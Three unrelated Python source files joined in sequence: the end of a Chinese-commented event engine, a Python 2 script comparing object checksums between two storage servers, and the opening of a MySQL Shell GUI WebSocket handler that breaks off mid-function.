self.__queue = Queue()
# 事件引擎开关
self.__active = False
# 事件处理线程
self.__thread = Thread(target = self.__run)
# 计时器,用于触发计时器事件
self.__timer = QTimer()
self.__timer.timeout.connect(self.__onTimer)
# 这里的__handlers是一个字典,用来保存对应的事件调用关系
# 其中每个键对应的值是一个列表,列表中保存了对该事件进行监听的函数功能
self.__handlers = defaultdict(list)
# __generalHandlers是一个列表,用来保存通用回调函数(所有事件均调用)
self.__generalHandlers = []
#----------------------------------------------------------------------
def __run(self):
"""引擎运行"""
while self.__active == True:
try:
event = self.__queue.get(block = True, timeout = 1) # 获取事件的阻塞时间设为1秒
self.__process(event)
except Empty:
pass
#----------------------------------------------------------------------
def __process(self, event):
"""处理事件"""
# 检查是否存在对该事件进行监听的处理函数
if event.type_ in self.__handlers:
# 若存在,则按顺序将事件传递给处理函数执行
[handler(event) for handler in self.__handlers[event.type_]]
# 以上语句为Python列表解析方式的写法,对应的常规循环写法为:
#for handler in self.__handlers[event.type_]:
#handler(event)
# 调用通用处理函数进行处理
if self.__generalHandlers:
[handler(event) for handler in self.__generalHandlers]
#----------------------------------------------------------------------
def __onTimer(self):
"""向事件队列中存入计时器事件"""
# 创建计时器事件
event = Event(type_=EVENT_TIMER)
# 向队列中存入计时器事件
self.put(event)
#----------------------------------------------------------------------
def start(self, timer=True):
"""
引擎启动
timer:是否要启动计时器
"""
# 将引擎设为启动
self.__active = True
# 启动事件处理线程
self.__thread.start()
# 启动计时器,计时器事件间隔默认设定为1秒
if timer:
self.__timer.start(1000)
#----------------------------------------------------------------------
def stop(self):
"""停止引擎"""
# 将引擎设为停止
self.__active = False
# 停止计时器
self.__timer.stop()
# 等待事件处理线程退出
self.__thread.join()
#----------------------------------------------------------------------
def register(self, type_, handler):
"""注册事件处理函数监听"""
# 尝试获取该事件类型对应的处理函数列表,若无defaultDict会自动创建新的list
handlerList = self.__handlers[type_]
# 若要注册的处理器不在该事件的处理器列表中,则注册该事件
if handler not in handlerList:
handlerList.append(handler)
#----------------------------------------------------------------------
def unregister(self, type_, handler):
"""注销事件处理函数监听"""
# 尝试获取该事件类型对应的处理函数列表,若无则忽略该次注销请求
handlerList = self.__handlers[type_]
# 如果该函数存在于列表中,则移除
if handler in handlerList:
handlerList.remove(handler)
# 如果函数列表为空,则从引擎中移除该事件类型
if not handlerList:
del self.__handlers[type_]
#----------------------------------------------------------------------
def put(self, event):
"""向事件队列中存入事件"""
self.__queue.put(event)
#----------------------------------------------------------------------
def registerGeneralHandler(self, handler):
"""注册通用事件处理函数监听"""
if handler not in self.__generalHandlers:
self.__generalHandlers.append(handler)
#----------------------------------------------------------------------
def unregisterGeneralHandler(self, handler):
"""注销通用事件处理函数监听"""
if handler in self.__generalHandlers:
self.__generalHandlers.remove(handler)
########################################################################
class EventEngine2(object):
"""
计时器使用python线程的事件驱动引擎
"""
#----------------------------------------------------------------------
def __init__(self):
"""初始化事件引擎"""
# 事件队列
self.__queue = Queue()
# 事件引擎开关
self.__active = False
# 事件处理线程
self.__thread = Thread(target = self.__run)
# 计时器,用于触发计时器事件
self.__timer = Thread(target = self.__runTimer)
self.__timerActive = False # 计时器工作状态
self.__timerSleep = 1 # 计时器触发间隔(默认1秒)
# 这里的__handlers是一个字典,用来保存对应的事件调用关系
# 其中每个键对应的值是一个列表,列表中保存了对该事件进行监听的函数功能
self.__handlers = defaultdict(list)
# __generalHandlers是一个列表,用来保存通用回调函数(所有事件均调用)
self.__generalHandlers = []
#----------------------------------------------------------------------
def __run(self):
"""引擎运行"""
while self.__active == True:
try:
event = self.__queue.get(block = True, timeout = 1) # 获取事件的阻塞时间设为1秒
self.__process(event)
except Empty:
pass
#----------------------------------------------------------------------
def __process(self, event):
"""处理事件"""
# 检查是否存在对该事件进行监听的处理函数
if event.type_ in self.__handlers:
# 若存在,则按顺序将事件传递给处理函数执行
[handler(event) for handler in self.__handlers[event.type_]]
# 以上语句为Python列表解析方式的写法,对应的常规循环写法为:
#for handler in self.__handlers[event.type_]:
#handler(event)
# 调用通用处理函数进行处理
if self.__generalHandlers:
[handler(event) for handler in self.__generalHandlers]
#----------------------------------------------------------------------
def __runTimer(self):
"""运行在计时器线程中的循环函数"""
while self.__timerActive:
# 创建计时器事件
event = Event(type_=EVENT_TIMER)
# 向队列中存入计时器事件
self.put(event)
# 等待
sleep(self.__timerSleep)
#----------------------------------------------------------------------
def start(self, timer=True):
"""
引擎启动
timer:是否要启动计时器
"""
# 将引擎设为启动
self.__active = True
# 启动事件处理线程
self.__thread.start()
# 启动计时器,计时器事件间隔默认设定为1秒
if timer:
self.__timerActive = True
self.__timer.start()
#----------------------------------------------------------------------
def stop(self):
"""停止引擎"""
# 将引擎设为停止
self.__active = False
# 停止计时器
self.__timerActive = False
self.__timer.join()
# 等待事件处理线程退出
self.__thread.join()
#----------------------------------------------------------------------
def register(self, type_, handler):
"""注册事件处理函数监听"""
# 尝试获取该事件类型对应的处理函数列表,若无defaultDict会自动创建新的list
handlerList = self.__handlers[type_]
# 若要注册的处理器不在该事件的处理器列表中,则注册该事件
if handler not in handlerList:
handlerList.append(handler)
#----------------------------------------------------------------------
def unregister(self, type_, handler):
"""注销事件处理函数监听"""
# 尝试获取该事件类型对应的处理函数列表,若无则忽略该次注销请求
handlerList = self.__handlers[type_]
# 如果该函数存在于列表中,则移除
if handler in handlerList:
handlerList.remove(handler)
# 如果函数列表为空,则从引擎中移除该事件类型
if not handlerList:
del self.__handlers[type_]
#----------------------------------------------------------------------
def put(self, event):
"""向事件队列中存入事件"""
self.__queue.put(event)
#----------------------------------------------------------------------
def registerGeneralHandler(self, handler):
"""注册通用事件处理函数监听"""
if handler not in self.__generalHandlers:
self.__generalHandlers.append(handler)
#----------------------------------------------------------------------
def unregisterGeneralHandler(self, handler):
"""注销通用事件处理函数监听"""
if handler in self.__generalHandlers:
self.__generalHandlers.remove(handler)
########################################################################
class Event:
"""事件对象"""
#----------------------------------------------------------------------
def __init__(self, type_=None):
"""Constructor"""
self.type_ = type_ # 事件类型
self.dict_ = {} # 字典用于保存具体的事件数据
#----------------------------------------------------------------------
def test():
"""测试函数"""
import sys
from datetime import datetime
from qtpy.QtCore import QCoreApplication
def simpletest(event):
print(u'处理每秒触发的计时器事件:{}'.format(str(datetime.now())))
app = QCoreApplication(sys.argv)
ee = EventEngine2()
#ee.register(EVENT_TIMER, simpletest)
ee.registerGeneralHandler(simpletest)
ee.start()
app.exec_()
# 直接运行脚本可以进行测试
if __name__ == '__main__':
test()
|
checkData.py
|
#!/usr/bin/python
# -*- coding:utf-8 -*-
import obsPyCmd
import hashlib
import random
import logging
import re
import time
import os
import threading
logFile = 'log/checkData.log'
if not os.path.exists('log'): os.mkdir('log')
if os.path.exists(logFile) and os.path.getsize(logFile) > 104857600: os.remove(logFile)
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(thread)d %(filename)s:%(lineno)d %(levelname)s %(message)s', filename=logFile, filemode='a')
MD5_Global = None
def getAllBucketsFromXML(xmlBody):
return sorted(re.findall('<Name>(.+?)</Name>', xmlBody))
#返回列表
def getAllObjectsFromXML(xmlBody):
keys = re.findall('<Key>(.+?)</Key>', xmlBody)
versions = re.findall('<VersionId>(.+?)</VersionId>', xmlBody)
for i in range(len(versions)):
if versions[i] == 'null': versions[i]=None
if len(versions)>0 and len(versions) != len(keys):
logging.error('response error, versions != keys %s' %xmlBody)
return []
if not len(versions): versions = [None for i in range(len(keys))]
return zip(keys,versions)
def getMarkerFromXML(xmlBody, markerStr):
marker = re.findall('<' + markerStr + '>(.+?)</' + markerStr + '>', xmlBody)
if marker and marker[0]:
logging.info('get marker in response %s' %marker[0])
return marker[0]
else:
logging.info('get no marker in response')
return None
#若calMd5为True,返回body MD5,否则返回响应body内容。
#若响应错误,返回空。
def make_request(obsRequesthandler, calMd5 = None, process=None):
global MD5_Global
myHTTPConnection = obsRequesthandler.myHTTPConnection
obsRequest = obsRequesthandler.obsRequest
returnData = None
#如果计算MD5则随机一个CHUNK_SIZE,否则固定CHUNK_SIZE大小。
if calMd5:
md5hashPart = 0; md5hashTotal = 0; fileHash = hashlib.md5();
checkData = False
CHUNK_SIZE = random.randint(4096,1048576)
logging.debug('CHUNK_SIZE: %d' %CHUNK_SIZE)
else: CHUNK_SIZE = 65536
peerAddr = myHTTPConnection.host; localAddr = ''
httpResponse = None
recvBody = ''
start_time = time.time()
end_time=0; status = '9999 '
try:
start_time = time.time()
myHTTPConnection.connection.putrequest(obsRequest.method, obsRequest.url, skip_host=1)
#发送HTTP头域
for k in obsRequest.headers.keys():
myHTTPConnection.connection.putheader(k, obsRequest.headers[k])
myHTTPConnection.connection.endheaders()
localAddr = str(myHTTPConnection.connection.sock._sock.getsockname())
peerAddr = str(myHTTPConnection.connection.sock._sock.getpeername())
logging.debug( 'Request:[%s], conn:[%s->%s], sendURL:[%s], sendHeaders:[%r], sendContent:[%s]' \
%(obsRequest.requestType, localAddr, peerAddr, obsRequest.url, obsRequest.headers, obsRequest.sendContent[0:1024]))
myHTTPConnection.connection.send(obsRequest.sendContent)
waitResponseTimeStart = time.time()
#接收响应
httpResponse = myHTTPConnection.connection.getresponse(buffering=True)
waitResponseTime = time.time() - waitResponseTimeStart
logging.debug('get response, wait time %.3f' %waitResponseTime)
#读取响应体
contentLength = int(httpResponse.getheader('Content-Length', '-1'))
logging.debug('get ContentLength: %d' %contentLength)
#区分不同的请求,对于成功响应的GetObject请求,需要特殊处理,否则一次读完body内容。
#需要考虑range下载,返回2xx均为正常请求。
recvBytes = 0
if (httpResponse.status < 300) and obsRequest.requestType in ('GetObject'):
#同时满足条件,才校验数据内容。
#1.打开calMd5开关。2.GetObject操作;3.正确返回200响应(206不计算)
while True:
datatmp = httpResponse.read(CHUNK_SIZE)
if not datatmp: break
recvBytes += len(datatmp)
if calMd5:
lastDatatmp = datatmp
fileHash.update(datatmp)
recvBody = '[receive content], length: %d' %recvBytes
if calMd5:
md5hashTotal = fileHash.hexdigest( )
returnData = md5hashTotal
else:
returnData = recvBody
else:
returnData = httpResponse.read()
recvBytes = len(returnData)
#要读完数据才算请求结束
end_time = time.time()
status = str(httpResponse.status) + ' ' + httpResponse.reason
#记日志、重定向(<400:debug; >=400,<500: warn; >=500:error)
if httpResponse.status < 400:
logging.debug('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime:[%.3f], responseStatus:[%s], %r, %r' \
%(obsRequest.requestType, localAddr, peerAddr,obsRequest.url, waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
elif httpResponse.status < 500:
logging.warn('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime:[%.3f], responseStatus:[%s], %r, %r' \
%(obsRequest.requestType, localAddr, peerAddr,obsRequest.url,waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
else:
logging.error('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime: [%.3f], responseStatus:[%s], %r, %r' \
%(obsRequest.requestType, localAddr, peerAddr,obsRequest.url, waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
if (httpResponse.status == 503):
flowControllMsg = 'Service unavailable, local data center is busy'
if recvBody.find(flowControllMsg) != -1: status = '503 Flow Control' #标记外部流控
requestID = httpResponse.getheader('x-amz-request-id', '9999999999999998')
#部分错误结果的头域中没有包含x-amz-request-id,则从recvBody中获取
if requestID == '9999999999999998' and httpResponse.status >= 300:
requestID = _getRequestIDFromBody_(recvBody)
if obsRequest.method != 'HEAD' and contentLength != -1 and contentLength != recvBytes:
logging.error('data error. contentlength %d != dataRecvSize %d' %(contentLength, recvBytes))
raise Exception("Data Error Content-Length")
except KeyboardInterrupt:
if not status: status = '9991 KeyboardInterrupt'
except Exception, data:
returnData = None
import traceback
stack = traceback.format_exc()
logging.error('Caught exception:%s, Request:[%s], conn: [local:%s->peer:%s], URL:[%s], responseStatus:[%s], responseBody:[%r]' \
%(data, obsRequest.requestType, localAddr, peerAddr, obsRequest.url, status, recvBody[0:1024]))
logging.error('print stack: %s' %stack)
print 'ERROR: request %s/%s except: %s' %(obsRequest.bucket, obsRequest.key, stack)
finally:
if not end_time: end_time = time.time()
#关闭连接:1.按服务端语义,若connection:close,则关闭连接。
if httpResponse and (httpResponse.getheader('connection', '').lower() == 'close' or httpResponse.getheader('Connection', '').lower() == 'close'):
#关闭连接,让后续请求再新建连接。
logging.info('server inform to close connection')
myHTTPConnection.closeConnection()
#2.客户端感知的连接类错误,关闭连接。
elif not status <= '600':
logging.warning('caught exception, close connection')
#很可能是网络异常,关闭连接,让后续请求再新建连接。
myHTTPConnection.closeConnection()
time.sleep(.1)
#3.客户端配置了短连接
elif not myHTTPConnection.longConnection:
#python 2.7以下存在bug,不能直接使用close()方法关闭连接,不然客户端存在CLOSE_WAIT状态。
if myHTTPConnection.isSecure:
try:
import sys
if sys.version < '2.7':
import gc
gc.collect(0)
except: pass
else: myHTTPConnection.closeConnection()
if process: MD5_Global = returnData
return returnData
if __name__ == '__main__':
global MD5_Global_
printResult = time.time()
Service_1= '100.61.5.3'
Service_2 = '100.61.5.13'
#可以指定多个用户的AK,SK
User_AKSK = ['UDSIAMSTUBTEST000101,Udsiamstubtest000000UDSIAMSTUBTEST000101',]
#server = '127.0.0.1', isSecure = False, timeout=80, serialNo = None, longConnection = False
server1_conn = obsPyCmd.MyHTTPConnection(host=Service_1, isSecure=False, timeout=600, serialNo=0, longConnection=False)
server2_conn = obsPyCmd.MyHTTPConnection(host=Service_2, isSecure=False, timeout=600, serialNo=0, longConnection=False)
totalObjectsOK = 0
totalObjectsErr = 0
totalReadErr = 0
userOK=True
for AKSK in User_AKSK:
print 'INFO: compare user %s' %AKSK
#列举用户所有桶
obsRequest = obsPyCmd.OBSRequestDescriptor(requestType ='ListUserBuckets', ak = AKSK.split(',')[0], sk = AKSK.split(',')[1], \
AuthAlgorithm='AWSV2', virtualHost = False, domainName = '', region='')
obsRequesthandler1 = obsPyCmd.OBSRequestHandler(obsRequest, server1_conn)
Buckets_1 = make_request(obsRequesthandler1)
obsRequesthandler2 = obsPyCmd.OBSRequestHandler(obsRequest, server2_conn)
Buckets_2 = make_request(obsRequesthandler2)
#比较桶是否一致
Buckets_1 = getAllBucketsFromXML(Buckets_1)
Buckets_2 = getAllBucketsFromXML(Buckets_2)
logging.info('Buckets_1: %r, Buckets_2: %r' %(Buckets_1, Buckets_2))
print 'Buckets on Server1: %r, Buckets on Server2: %r' %(Buckets_1, Buckets_2)
Buckets = set(Buckets_1) & set(Buckets_2)
if not Buckets:
logging.error('find no same buckets exit')
print 'ERROR: no same buckets for this user'
break
open('Objects_1_List.txt','w').write('')
open('Objects_2_List.txt','w').write('')
#遍历桶
for bucket in Buckets:
open('Objects_1_List.txt','a').write('\n' + bucket)
open('Objects_2_List.txt','a').write('\n' + bucket)
msg = 'INFO: compare bucket: %s' %bucket
logging.info(msg)
print msg
obsRequest = obsPyCmd.OBSRequestDescriptor(requestType ='ListObjectsInBucket', ak = AKSK.split(',')[0], sk = AKSK.split(',')[1], \
AuthAlgorithm='AWSV2', virtualHost =False, domainName = '', region='')
obsRequest.queryArgs['max-keys'] = '999'
obsRequest.queryArgs['versions'] = None
obsRequest.bucket = bucket
Objects_1_List = []; Objects_2_List = []
k_marker1 = ''; k_marker2=''
v_marker1 = ''; v_marker2=''
while k_marker1 != None or k_marker2 != None:
if k_marker1 != None:
if k_marker1: obsRequest.queryArgs['key-marker'] = k_marker1
if v_marker1: obsRequest.queryArgs['version-id-marker'] = v_marker1
obsRequesthandler1 = obsPyCmd.OBSRequestHandler(obsRequest, server1_conn)
Objects_1 = make_request(obsRequesthandler1)
k_marker1 = getMarkerFromXML(Objects_1, 'NextKeyMarker')
v_marker1 = getMarkerFromXML(Objects_1, 'NextVersionIdMarker')
if v_marker1 == 'null': v_marker1 = None
newObjs1 = getAllObjectsFromXML(Objects_1)
Objects_1_List += newObjs1
logging.debug('Objects_1_List: %s' %Objects_1_List)
open('Objects_1_List.txt','a').write('\n\t' + str(newObjs1).replace('), (', '\n\t'))
if k_marker2 != None:
if k_marker2: obsRequest.queryArgs['key-marker'] = k_marker2
if v_marker2: obsRequest.queryArgs['version-id-marker'] = v_marker2
obsRequesthandler2 = obsPyCmd.OBSRequestHandler(obsRequest, server2_conn)
Objects_2 = make_request(obsRequesthandler2)
k_marker2 = getMarkerFromXML(Objects_2, 'NextKeyMarker')
v_marker2 = getMarkerFromXML(Objects_2, 'NextVersionIdMarker')
if v_marker2 == 'null': v_marker2 = None
newObjs2 = getAllObjectsFromXML(Objects_2)
Objects_2_List += newObjs2
logging.debug('Objects_2_List: %s' %Objects_2_List)
open('Objects_2_List.txt','a').write('\n\t' + str(newObjs2).replace('), (', '\n\t'))
#找到合集中相同集合
Obj12 = set(Objects_1_List) & set(Objects_2_List)
logging.info('get same objects %d, len Obj1:%d, lenObj2:%d' %(len(Obj12),len(Objects_1_List), len(Objects_2_List)))
#校验obj
for obj in Obj12:
#2边读对象
msg = 'INFO: compare object: %s/%s' %(bucket,obj)
#print msg
logging.info(msg)
obsRequest_getobj = obsPyCmd.OBSRequestDescriptor(requestType ='GetObject', ak = AKSK.split(',')[0], sk = AKSK.split(',')[1], \
AuthAlgorithm='AWSV2', virtualHost =False, domainName = '', region='')
obsRequest_getobj.bucket = bucket
obsRequest_getobj.key = obj[0]
if obj[1]: obsRequest_getobj.queryArgs['versionId'] = obj[1]
obsRequesthandler1 = obsPyCmd.OBSRequestHandler(obsRequest_getobj, server1_conn)
obsRequesthandler2 = obsPyCmd.OBSRequestHandler(obsRequest_getobj, server2_conn)
t1 = threading.Thread(target=make_request, name='thread1', args=(obsRequesthandler1, True, True))
t1.start();
md5_2 = make_request(obsRequesthandler2, True, False)
t1.join();
md5_1 = MD5_Global
if not md5_1 or not md5_2:
totalReadErr += 2
msg = 'ERROR: read Object error. can not get md5. %s/%s, md5_1:%s, md5_2:%s' %(bucket, obj, md5_1, md5_2)
print msg; logging.error(msg)
elif md5_1 != md5_2:
totalObjectsErr += 2
msg = 'ERROR: Data Not Consistent. object: [%s/%s], MD5 on server1: %s, MD5 on server2: %s' %(bucket, obj, md5_1, md5_2)
print msg
logging.error(msg)
elif md5_1 == md5_2:
totalObjectsOK += 2
logging.info('Data Consistent. object: [%s/%s], MD5 on server1: %s, MD5 on server2: %s' %(bucket, obj, md5_1, md5_2))
if time.time() - printResult > 10:
progress = 'INFO: totalObjectsOK: %d, totalObjectsErr:%d, totalReadErr:%d' %(totalObjectsOK, totalObjectsErr,totalReadErr)
print progress; logging.info(progress)
printResult = time.time()
#去掉各自相同的部分
Objects_1_List = list(set(Objects_1_List) - Obj12)
Objects_2_List = list(set(Objects_2_List) - Obj12)
#如果不相同的部分相差超过了10000个,跳过该桶
if len(Objects_1_List)>10000 or len(Objects_2_List) >10000:
msg = 'ERROR: too many objects not equal, jump this bucket...'
totalObjectsErr += 10000
logging.error(msg); print msg;
break
if Objects_1_List:
totalObjectsErr += len(Objects_1_List)
msg = 'ERROR: Objects in server1 but not in server2 %r' %Objects_1_List
print msg
logging.error(msg)
if Objects_2_List:
totalObjectsErr += len(Objects_2_List)
msg = 'ERROR: Objects in server2 but not in server1 %r' %Objects_2_List
print msg
logging.error(msg)
logging.info('totalObjectsOK: %d, totalObjectsErr:%d, totalReadErr:%d' %(totalObjectsOK, totalObjectsErr,totalReadErr))
print 'totalObjectsOK: %d, totalObjectsErr:%d, totalReadErr:%d' %(totalObjectsOK, totalObjectsErr,totalReadErr)
|
ShellGuiWebSocketHandler.py
|
# Copyright (c) 2020, 2022, Oracle and/or its affiliates.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License, version 2.0,
# as published by the Free Software Foundation.
#
# This program is also distributed with certain software (including
# but not limited to OpenSSL) that is licensed under separate terms, as
# designated in a particular file or component or in included license
# documentation. The authors of MySQL hereby grant you an additional
# permission to link the program and your derivative works with the
# separately licensed software that they have included with MySQL.
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See
# the GNU General Public License, version 2.0, for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import gui_plugin as gui
import threading
import uuid
import datetime
import json
import re
import hashlib
import base64
import inspect
from gui_plugin.core.HTTPWebSocketsHandler import HTTPWebSocketsHandler
from gui_plugin.core.Db import GuiBackendDb
from gui_plugin.core.Protocols import Response
import gui_plugin.core.Logger as logger
import gui_plugin.core.WebSocketCommon as WebSocket
from gui_plugin.core.modules.ModuleSession import ModuleSession
import mysqlsh
from contextlib import contextmanager
from gui_plugin.users import backend as user_handler
from gui_plugin.users.backend import get_id_personal_user_group
from queue import Queue, Empty
from gui_plugin.core.RequestHandler import RequestHandler
from gui_plugin.core.BackendDbLogger import BackendDbLogger
class ShellGuiWebSocketHandler(HTTPWebSocketsHandler):
def _is_shell_object(self, object):
return type(object).__name__ in ['Dict', 'List']
def setup(self):
super(ShellGuiWebSocketHandler, self).setup()
self._db = None
self._session_user_id = None
self._session_user_personal_group_id = None
self._active_profile_id = None
self._module_sessions = {}
self._requests = {}
self._requests_mutex = threading.Lock()
self.key = None
self.packets = {}
# Registry of handlers for prompt requests sent to the FE
self._prompt_handlers = {}
# A thread will be processing all the responses
self._response_queue = Queue()
self._response_thread = threading.Thread(target=self.process_responses)
def process_responses(self):
while self.connected:
try:
json_message = self._response_queue.get(timeout=1)
except Empty as e:
continue
self.send_message(json.dumps(json_message, default=str))
def process_message(self, json_message):
if 'request' in json_message:
request = json_message.get('request')
if request == 'authenticate':
if not self.is_authenticated:
self.authenticate_session(json_message)
else:
self.send_response_message('ERROR',
'This session was already '
'authenticated.',
json_message.get('request_id'))
elif not self.is_authenticated:
self.send_response_message('ERROR',
'This session is not yet '
'authenticated.',
json_message.get('request_id'))
elif request == 'execute':
self.execute_command_request(json_message)
elif request == 'cancel':
self.cancel_request(json_message)
elif request == 'prompt_reply':
self.prompt_reply(json_message)
else:
self.send_response_message('ERROR',
f'Unknown request: {request}.',
json_message.get('request_id'))
def on_ws_message(self, frame: WebSocket.Frame):
if frame.is_initial_fragment:
self.packets[self.session_uuid] = WebSocket.Packet()
self.packets[self.session_uuid].append(frame)
if self.packets[self.session_uuid].done():
message = self.packets[self.session_uuid].message
del self.packets[self.session_uuid]
logger.debug3(f"<- {message}")
try:
json_message = None
try:
json_message = json.loads(message)
except Exception as e:
raise Exception("Unable to decode the JSON message.")
if 'request' not in json_message:
raise Exception(
"The message is missing the 'request' attribute.")
if 'request_id' not in json_message:
raise Exception(
"The message is missing the 'request_id' attribute.")
request_id = json_message["request_id"]
# log message, if logging does not work, do not process
# the message due to security concerns
if not BackendDbLogger.message(self.session_id, json.dumps(message), is_response=False,
request_id=request_id):
raise Exception("Unable to process the request.")
self.process_message(json_message)
except Exception as e:
# Add the request id to the response if we have it available
args = {}
if json_message and 'request_id' in json_message:
args['request_id'] = json_message["request_id"]
# log the original message
BackendDbLogger.message(self.session_id,
json.dumps(message), is_response=False)
self.send_json_response(Response.exception(e, args))
def on_ws_connected(self):
logger.info("Websocket connected")
reset_session = False
if 'SessionId' in self.cookies.keys():
requested_session_id = self.cookies['SessionId']
self.session_uuid = str(requested_session_id)
try:
with self.db_tx() as db:
row = db.execute(
"""SELECT * FROM session
WHERE uuid=? AND source_ip=?
ORDER BY id DESC
LIMIT 1""", (requested_session_id, self.client_address[0])).fetch_one()
if row is not None:
if row['ended'] is not None:
# recover the session by using a continued session
db.execute(
'INSERT INTO session(uuid, continued_session_id, user_id, started, source_ip) VALUES(?, ?, ?, ?, ?)',
(requested_session_id, row['continued_session_id'] + 1, row['user_id'], datetime.datetime.now(), self.client_address[0]))
# In transaction context so the right id is returned
self.session_id = db.get_last_row_id()
row = db.execute(
"SELECT * FROM session WHERE id=?", (self.session_id, )).fetch_one()
if row['user_id'] and row['uuid']:
self.session_uuid = requested_session_id
self.session_id = row['uuid']
self._session_user_id = row['user_id']
self._session_user_personal_group_id = get_id_personal_user_group(
db, self._session_user_id)
default_profile = user_handler.get_default_profile(
db, self._session_user_id)
self.set_active_profile_id(
default_profile["id"])
threading.current_thread(
).name = f'wss-{self.session_uuid}'
# TODO(anyone): Why querying the "active profile" if it has been just set to the default profile?
active_profile = user_handler.get_profile(
db, self.session_active_profile_id)
self.send_response_message('OK', 'Session recovered', values={
"session_uuid": self.session_uuid,
"local_user_mode": self.is_local_session,
"active_profile": active_profile})
# Starts the response processor...
self._response_thread.start()
return
# If reaches this point it means the session id on the cookie was not valid at the end
# so we make sure a new session is created with the right UUID
reset_session = True
except Exception as e:
# No problem, we continue to create the new session
pass
# define a session uuid
if reset_session:
self.db.close()
self._db = None
self.session_uuid = str(uuid.uuid1())
# set the name of the current thread to the session_uuid
threading.current_thread().name = f'wss-{self.session_uuid}'
# insert this new session into the session table
try:
logger.info("Registering session...")
with self.db_tx() as db:
db.execute(
'INSERT INTO session(uuid, continued_session_id, started, source_ip) VALUES(?, ?, ?, ?)',
(self.session_uuid, 0, datetime.datetime.now(), self.client_address[0]))
self.session_id = db.get_last_row_id()
except Exception as e: # pragma: no cover
logger.error(f'Session could not be inserted into db. {e}')
self.send_json_response(Response.exception(e))
self._ws_close()
return
# send the session uuid back to the browser
logger.info("Sending response...")
self.send_response_message('OK', 'A new session has been created',
values={"session_uuid": self.session_uuid,
"local_user_mode": self.is_local_session})
# Starts the response processor...
self._response_thread.start()
def on_ws_closed(self):
# if the database connection for this thread was opened, close it
if self._db:
if self.session_uuid:
self.db.execute("UPDATE session SET ended=? WHERE uuid=?",
(datetime.datetime.now(), self.session_uuid))
self._db.close()
# close module sessions. use a copy so that we don't change the dict during the for
for module_session in dict(self._module_sessions).values():
module_session.close()
if self._response_thread.is_alive():
self._response_thread.join()
logger.info("Websocket closed")
def on_ws_sending_message(self, message):
json_message = json.loads(message)
if BackendDbLogger.message(self.session_id, message, is_response=True,
request_id=json_message.get('request_id', None)):
return message
logger.error("Failed to log message in the database.")
return json.dumps(Response.error(
"Response cancelled by the application.", {
"request_id": json_message["request_id"]
}))
def check_credentials(self, auth_header):
if self.cached_successful_auth == auth_header:
return True
# decode provided credentials
credentials = base64.b64decode(
auth_header[6:].encode("utf8")).decode("utf-8").split(':')
username = credentials[0]
password = credentials[1]
# since this function is called from outside a websocket session
# use separate GuiBackendDb() instance that needs to be closed
db = GuiBackendDb()
success = False
try:
res = db.execute('''SELECT id, password_hash
FROM user
WHERE name = ?''',
(username, )).fetch_one()
if res:
salt = res['password_hash'][:64]
password_hash = hashlib.pbkdf2_hmac(
'sha256', password.encode(), salt.encode(), 100000).hex()
if res['password_hash'][64:] == password_hash:
success = True
self.cached_successful_auth = auth_header
except Exception as e:
error_msg = f'User could not be authenticated. {str(e)}.'
logger.error(error_msg)
finally:
db.close()
return success
def send_json_response(self, json_message):
# Special handling required for shell objects
if self._is_shell_object(json_message):
json_message = json.loads(str(json_message).replace("\n", "\\n"))
self._response_queue.put(json_message)
def send_response_message(self, msg_type, msg, request_id=None,
values=None, api=False):
# get message text which is either a Dict that is converted to JSON or
# a str
msg_text = json.dumps(msg) if isinstance(msg, dict) else msg
# if a request_id is given, add it to the message
id_arg = {"request_id": request_id} if request_id else {}
values_arg = {}
if not values is None:
# Special handling required for shell objects
if self._is_shell_object(values):
values = json.loads(str(values).replace("\n", "\\n"))
if api:
values_arg = {"result": values}
else:
# TODO(rennox): We should normalize the returning of responses
# there is no reason to have different flavors based on the
# type of values being returned
values_arg = values if isinstance(values, dict) else {
"result": values}
full_response = Response.standard(
msg_type, msg_text, {**id_arg, **values_arg})
# send the response message
self.send_json_response(full_response)
if msg_type in ["OK", "ERROR", "CANCELLED"]:
self.unregister_module_request(request_id)
def send_command_response(self, request_id, values):
# TODO(rennox): This function has to do weird magic because it
# is called to send the response from different commands, the
# PROBLEM is that the commands should NEVER be creating the
# response themselves, they should be implemented as simple APIs
# and their either succeed and return whatever value they return... or
# they should throw exceptions
if isinstance(values, dict) and 'request_state' in values:
values["request_id"] = request_id
# send the response message
self.send_json_response(values)
self.unregister_module_request(request_id)
else:
self.send_response_message(
"OK", "", request_id=request_id, values=values, api=True)
@property
def is_authenticated(self):
return self.session_user_id is not None
@property
def session_user_id(self):
return self._session_user_id
@property
def session_active_profile_id(self):
return self._active_profile_id
def set_active_profile_id(self, profile_id):
self._active_profile_id = profile_id
@property
def db(self):
# if the db object has not yet been initialized for this thread
if not self._db:
# open the database connection for this thread
self._db = GuiBackendDb(
log_rotation=True, web_session=WebSession(self))
return self._db
@contextmanager
def db_tx(self):
close = False
if threading.current_thread().getName() == self.session_uuid:
db = self.db
# if not, initialize a new database connection since SQLite objects
# can only be used in the thread they were created in
else:
close = True
db = GuiBackendDb()
try:
db.start_transaction()
yield db
db.commit()
except Exception:
db.rollback()
raise
finally:
if close:
db.close()
def get_module_session_object(self, module_session_id) -> ModuleSession:
# Check if there is a module_session with the given
# module_session_id in the module_session cache
module_session = self._module_sessions.get(module_session_id)
if not module_session:
raise Exception(f'There is no module_session in the cache that has '
f'the module_session_id '
f'{module_session_id} assigned.')
return module_session
def authenticate_session(self, json_msg):
request_id = json_msg.get('request_id')
username = json_msg.get('username')
try:
if self.is_local_session:
if username != gui.users.backend.LOCAL_USERNAME:
raise Exception('Incorrect username or password')
gui.users.backend.create_local_user(self.db)
row = self.db.execute(
'SELECT id, password_hash FROM user '
'WHERE upper(name) = upper(?)',
(username,)).fetch_one()
if row:
password_hash = None
if not self.is_local_session:
salt = row['password_hash'][64:]
password_hash = hashlib.pbkdf2_hmac(
